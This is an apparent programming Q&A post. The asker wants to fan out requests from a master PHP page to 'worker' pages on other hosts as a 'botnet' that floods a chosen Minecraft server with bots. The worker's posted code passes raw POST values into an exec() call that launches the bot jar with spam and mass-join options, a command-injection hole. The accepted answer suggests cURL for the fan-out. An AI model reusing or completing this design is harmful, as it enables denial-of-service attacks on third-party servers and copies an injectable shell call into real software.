# How do i send one request from php page to multiple php pages on other hosts

Tags: php

I am testing this new minecraft boting software and I am making a "botnet" style application, it would send information about target from a master website in this case "client.php" to other "worker.php" worker would start bot attack on a specified ip, port and for specified amount of time. Now this all works the only problem is how do I send multiple requests to multiple workers across ip's since when you send query on a specified php website it will redirect you there I just cannot figure it out how I would do that.

This is the "attack" function on worker

```
function sendBots() {
    // POST some variables
    $serverIP = $_POST['ip'];
    $serverPort = $_POST['port'];
    $attackTime = $_POST['atime'];
    $attackThreads = $_POST['threads'];
    $sessionName = $_POST['session'];

    // execute bot.jar with screen and defined variables
    // copy and add more if you wish to run more bot clients on this node at same time
    exec("screen -S " . $sessionName . " java -jar /var/www/html/bot.jar -move false -ping false -pingamount 1 -host " .
    $serverIP . " -port " . $serverPort . " -threads " . $attackThreads . " -nicksize 8 -stay true -stayl 60 -mode NICKS
    -nicks RANDOM -spam true -ach true -doublej true -joinamount 1 -protocol 340 -msg randommsg 25 -proxymode HTTP -login /l
    test1234 -register /register test1234 test1234 -time " . $attackTime );

}
```

I already wrote a script that accepts those variables above and forwards them to this function.

Basically I need to call this function on multiple servers but without redirecting user to one of this websites.

Thank you for your time.

Comment: I'm not so sure if a question containing 'attack' and 'threads' will receive so much positive engagement.

Comment: It's a penetesting tool not something meant to be used to do bad stuff. only for personal use.

Answer (score -1, accepted):

I'm not sure if I understand it well but if you want to "run" a website without going to it, please use CURL https://secure.php.net/manual/en/function.curl-exec.php